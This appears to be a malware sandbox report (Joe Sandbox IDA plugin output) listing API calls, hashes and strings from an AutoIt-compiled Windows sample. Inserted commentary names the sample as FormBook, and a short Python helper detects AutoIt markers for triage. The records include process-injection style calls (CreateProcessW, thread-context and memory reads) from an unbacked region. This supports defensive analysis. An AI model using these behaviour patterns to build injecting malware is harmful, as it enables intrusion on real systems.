                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconNotifyShell_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1144537725-0
                                                                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 680241177-0
                                                                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                        • _free.LIBCMT ref: 004295A0
                                                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                        • API String ID: 3938964917-2806939583
                                                                                                        • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                        • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                        Strings
                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcat
                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                        • API String ID: 1765576173-2684727018
                                                                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
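The two string references in the records above, >>>AUTOIT SCRIPT<<< and >>>AUTOIT NO CMDEXECUTE<<<, are marker strings carried by the AutoIt3 runtime stub, so seeing them next to the directory-handling and _strcat code paths is the quickest indication that the submitted dropper is an AutoIt-compiled executable wrapping the FormBook payload. The triage helper below is an added example and is not part of the Joe Sandbox report or of the sample; it scans a byte buffer for those two markers in both ASCII and UTF-16LE form and additionally for the AU3!EA06 compiled-script header magic, which is a well-known AutoIt marker that does not appear on this page. The sample buffer it scans is constructed inline so the script runs offline.

```python
"""Triage helper: flag AutoIt-compiled PE files by their embedded marker strings."""
from __future__ import annotations

import sys

# Markers observed in the report's Strings sections (ASCII form).
STUB_MARKERS = (
    b">>>AUTOIT SCRIPT<<<",
    b">>>AUTOIT NO CMDEXECUTE<<<",
)
# Compiled-script header magic; well-known AutoIt marker, assumed here and not taken from the page.
SCRIPT_MAGIC = b"AU3!EA06"

ALL_MARKERS = STUB_MARKERS + (SCRIPT_MAGIC,)


def _find_all(data: bytes, needle: bytes) -> list[int]:
    """Return every offset at which needle occurs in data."""
    offsets: list[int] = []
    start = 0
    while (idx := data.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


def find_markers(data: bytes) -> dict[str, list[int]]:
    """Map each marker (ASCII name) to the sorted offsets of its ASCII and UTF-16LE occurrences."""
    hits: dict[str, list[int]] = {}
    for marker in ALL_MARKERS:
        name = marker.decode("ascii")
        offsets = _find_all(data, marker) + _find_all(data, name.encode("utf-16-le"))
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def is_autoit_compiled(data: bytes) -> bool:
    """True when the buffer is a PE image (MZ header) carrying the AutoIt stub marker."""
    if data[:2] != b"MZ":
        return False
    return ">>>AUTOIT SCRIPT<<<" in find_markers(data)


def build_sample() -> bytes:
    """Constructed test buffer (not a real binary): MZ header, stub markers, script magic."""
    blob = b"MZ" + b"\x00" * 62                                  # 64-byte fake header
    blob += b">>>AUTOIT SCRIPT<<<"                                # ASCII marker at offset 64
    blob += b"\x00" * 8
    blob += ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le")     # wide marker at offset 91
    blob += b"\x00" * 4
    blob += SCRIPT_MAGIC                                          # header magic at offset 147
    return blob


def scan_file(path: str) -> dict[str, list[int]]:
    """Read a file from disk and report marker offsets (convenience for real samples)."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())


if __name__ == "__main__":
    data = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_markers(build_sample())
    for name, offsets in data.items():
        print(f"{name}: {', '.join(hex(o) for o in offsets)}")
```

Run it with a sample path to list marker offsets, or with no argument to scan the constructed buffer. A hit on >>>AUTOIT SCRIPT<<< inside an MZ image is a triage signal, not proof of malice: legitimate AutoIt programs carry the same stub, so the next step is extracting and reading the embedded script rather than classifying on the marker alone.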
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClearVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 1473721057-0
                                                                                                        • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                        • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                        APIs
                                                                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorLast__wsplitpath_malloc
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CreateFile
APIs
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
• __lock_file.LIBCMT ref: 00414A8D
  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
• __fclose_nolock.LIBCMT ref: 00414A98
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0454DA73
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0454DB09
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0454DB2B
Memory Dump Source
• Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
• Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
• Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
• Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
• Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
• Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
• Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
APIs
• Sleep.KERNELBASE(000001F4), ref: 0454E2C9
Memory Dump Source
• Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 5e7c23072836c714be944fc24bba39f1b9152fb80633935e911aa6835a044bb0
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 40E0E67494410DDFDB00DFB8D54969D7BB4FF04301F100561FD01D2280D6309D509A62
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(0099ED78,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                        • ImageList_BeginDrag.COMCTL32(0099ED78,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
